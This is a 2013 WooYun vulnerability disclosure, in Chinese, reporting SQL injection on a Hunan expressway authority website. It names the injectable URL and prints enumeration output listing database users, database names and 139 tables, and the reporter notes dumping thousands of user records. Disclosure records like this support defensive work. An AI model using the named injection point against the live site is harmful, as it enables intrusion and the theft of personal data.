当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040408

漏洞标题:湖南省高速公路管理局某处SQL注入

相关厂商:湖南省高速公路管理局

漏洞作者: xlz0iza1

提交时间:2013-10-21 16:25

修复时间:2013-12-05 16:26

公开时间:2013-12-05 16:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

湖南省高速公路管理局涉及到相关的数据库。

详细说明:

注入点:http://info.hngs.net/viewinfo.mpl?id=9042

QQ图片20131020130747.jpg


#1--users

database management system users [59]:
[*] 'nconf'@'localhost'
[*] 'ndouser'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
[*] 'tongbu'@'%'


#2--dbs

available databases [11]:
[*] dx
[*] imx365
[*] imx365a
[*] imx365b
[*] information_schema
[*] mysql
[*] nagios
[*] nconf
[*] performance_schema
[*] test
[*] way


漏洞证明:

#1--D imx365 --tables

Database: imx365
[139 tables]
+---------------------------+
| album_a_comments          |
| album_albums              |
| album_category            |
| album_i_comments          |
| album_i_favorites         |
| album_imagenotes          |
| album_images              |
| album_inalbum             |
| album_special             |
| article_attachments       |
| article_categorys         |
| article_comments          |
| article_favorite          |
| article_posts             |
| article_special           |
| article_topics            |
| article_tracks            |
| bbs_attach_uses           |
| bbs_attach_uses_recycle   |
| bbs_attachments           |
| bbs_digg_caii             |
| bbs_favorites             |
| bbs_gather_items          |
| bbs_gather_lists          |
| bbs_inforums              |
| bbs_inforums_recycle      |
| bbs_posts                 |
| bbs_posts_recycle         |
| bbs_stat_days             |
| bbs_stat_months           |
| bbs_stat_users            |
| bbs_stat_years            |
| bbs_statistics            |
| bbs_topics                |
| bbs_topics_recycle        |
| bbs_ts                    |
| bind_baidu                |
| bind_qzone                |
| bind_t                    |
| blog_attachments          |
| blog_blogs                |
| blog_categorys            |
| blog_comments             |
| blog_friendlinks          |
| blog_stat_day             |
| blog_stat_month           |
| blog_stat_total           |
| blog_stat_year            |
| blog_team                 |
| blog_trackbacks           |
| blog_weblogs              |
| channels                  |
| comicbbs_attachments      |
| comicbbs_digg_caii        |
| comicbbs_favorites        |
| comicbbs_posts            |
| comicbbs_topics           |
| comicbbs_topics_recycle   |
| forum_affiche             |
| forum_categorys           |
| forum_forums              |
| forum_specials            |
| game_games                |
| game_images               |
| game_joins                |
| game_ratings              |
| game_syndics              |
| game_topics               |
| group_groups              |
| group_ingroup             |
| group_joins               |
| group_posts               |
| group_topics              |
| image_ingroup             |
| ip_data                   |
| medal_categorys           |
| medals                    |
| message_box               |
| model_brands              |
| model_possibles           |
| model_products            |
| model_scales              |
| money_note                |
| online                    |
| search_counter            |
| search_strings            |
| search_use                |
| shop_brand                |
| shop_category             |
| shop_comment              |
| shop_favorite             |
| shop_guestbook            |
| shop_indent               |
| shop_news                 |
| shop_order                |
| shop_pay                  |
| shop_scale                |
| shop_send                 |
| shop_store                |
| shop_unit                 |
| sonicmodel_attachments    |
| sonicmodel_digg_caii      |
| sonicmodel_favorites      |
| sonicmodel_gather_items   |
| sonicmodel_gather_lists   |
| sonicmodel_posts          |
| sonicmodel_topics         |
| sonicmodel_topics_recycle |
| sonicmodel_ts             |
| sp_t                      |
| tag_string                |
| tag_use                   |
| task_email                |
| task_message              |
| tweet_comments            |
| tweet_favorites           |
| tweet_forwards            |
| tweet_statistics          |
| tweet_ts                  |
| tweets                    |
| user_concerns             |
| user_contacts             |
| user_entry_logs           |
| user_medal                |
| user_medal_log            |
| user_stat_day             |
| user_stat_month           |
| user_stat_total           |
| user_stat_week            |
| user_stat_year            |
| users                     |
| video_categorys           |
| video_comments            |
| video_lists               |
| video_stats               |
| vip_note                  |
| web_gather_items          |
| web_gather_lists          |
| web_lists                 |
+---------------------------+


USERS里面数据,还是挺多的用户的,跑了十分钟7000多条,还没有跑完!

QQ图片20131020132401.jpg


修复方案:

设计到一些个人信息,联系方式,所以还是比较严重的,ROOT权限可以跨多个数据表里面查询。

版权声明:转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-10-25 22:45

厂商回复:

最新状态:

暂无